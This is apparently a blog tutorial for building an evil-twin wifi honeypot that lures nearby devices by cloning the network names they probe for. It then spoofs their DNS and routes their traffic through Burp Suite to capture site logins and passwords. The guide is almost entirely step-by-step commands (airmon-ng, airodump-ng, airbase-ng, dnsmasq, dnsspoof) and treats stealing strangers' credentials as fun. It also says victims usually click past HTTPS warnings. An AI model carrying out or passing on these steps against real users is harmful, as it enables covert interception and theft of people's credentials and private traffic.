You will act as a wifi hotspot, providing internet. You are able to monitor those who connect to it and forward them to the real server, acting as a man-in-the-middle. You can intercept about every data or append it to your needs to forward that to the real server.
[CLIENT] <-------------> [ YOU ] <------------> [INTERNET]
What do you need?
- Linux OS; Kali
- Wifi Adapter that supports hosted network
- Internet
apt-get update
apt-get install aircrack-ng
NOTE: even kali and backtrack users I suggest you use dnsmasq [instead of dhcpserver3 or dhcpd ]and install it once again even if its already installed.
Next you need to have dnsmasq to get it type
apt-get install dnsmasqNow you are ready .. Lets start ..
Setting Up
First we need to gather some information ..plug in your usb wifi adapter if you have one and in terminal / console type
ifconfig
You should see something like this on your screen
There you will see wlan0 or even wlan1 [If you have extra wifi adapter ] . Take a note of what you have and then type
airmon-ng start wlan0
or
airmon-ng start wlan1
depending on what you have You should be able to see (monitor mode enabled on mon0)
Now thats done .. lets proceed ..
Next we need to monitor the airwaves to get the names of the wifi access point the clients are trying to connect to do that type
airodumpn-ng mon0
You should be able to see a few clients and under probe you will find the name of the Access Point the client is trying to connect to in this example we see that the client is searching for the wifi access point named achutetech
So we will create a Fake Ap with the name of achutetech and try to make the client connect to us . To do this we type ..
airbase-ng --essid achutetech mon0
In our example we see this
That we have successfully managed to create a fake AP and a client with an client also was successfully associated with our fake AP. But the client will still not be fully connected to our AP since we haven't provided it with any IP address . To do so we use dnsmasq
Note : I have tried using dhcpd or dnsserver3 but they seem to be error prone while configuring them and it was getting errors like Interface name is too long and all so I switched to dnsmasq and it seems to work great :D
To verify that we have dnsmasq type
whereis dnsmasq
and to see whether we have the configuration file or not [I have noticed that even tough dnsmasq was installed on Kali Os it didnt have the dnsmasq.conf file so to get it type apt-get install dnsmasq ]
and to verify that we have the config file type
ls /etc/ | grep dnsmasq
if dnsmasq.conf file is returned then its well and good But if not try
apt-get install dnsmasq
Ok now we have the dnsmasq we need to configure a few things type
vim /etc/dnsmasq.conf
[How to use vim - I will be writing a quick tutorial on it soon ]
now scroll down to line 90 or around you should see
# interface=
change it to
interface=at0
// at0 is the interface in which our FAKE AP lies
now scroll down even more to line 141 you should see
#dhcp-range=192.168.0.50,192.168.0.150,12h
just remove the #
and you are good to go :D
Now we have to supply an ip address to your router [i.e the fake ap ]
to do so type
ifconfig at0 192.168.0.1 up
and to start the dhcp service type
dnsmasq
Now your clients should be able to get an ip address for themselves.
Ok.. so we have created the Fake AP , our client is connected to us and we have supplied them with our dhcp pool of address .. With this all done lets begin the FUN part..
What we will be doing ?
We will be doing dns spoofing that is we will forward all our client's request to our own computer so that we can monitor the request and even modify them if we want to and get all those details like the sites visited , sites user name and password ..and even modify those request and response .. sounds lot of fun lets get going ..
DNS spoofing
to do dns spoofing type
dnsspoof -i at0
what we are doing is that we are forwarding all the dns request of our client to our own ip address .. we should be able to see something like this
now thats done we have dns spoofing running and every client request is being forwarded to our own ip address now we will bind a proxy to our ip address so that we can intercept and create a transparent proxy so that the client may be able to connect to the Internet.
Note : we must be connected to the Internet for the client to be able to connect to the Internet .
ok lets start burpsuite
Now go to the Proxy Tab and to the Options tab of it click on Add
Type In 80 In the bind to port box
and select your router address or your at0 address in our case it is 192.168.0.1
And click on request handling tab and check the tick box for support Invisible proxying
click on ok and we are done ..
Repeat the same with port no 443 to handle HTTPS requests :P
Now you can see any request the client makes in the intercept tab and you can tamper with it monitor it forward it or even drop it .. You are the BOSS now :D .. you can even get login id and passwords of different site the client uses .. but while using https site the client will get a warning ..which most of the time they ignore :D
(http://www.techgeektricks.blogspot.in/2013/07/mitm-wifi-honeypot.html)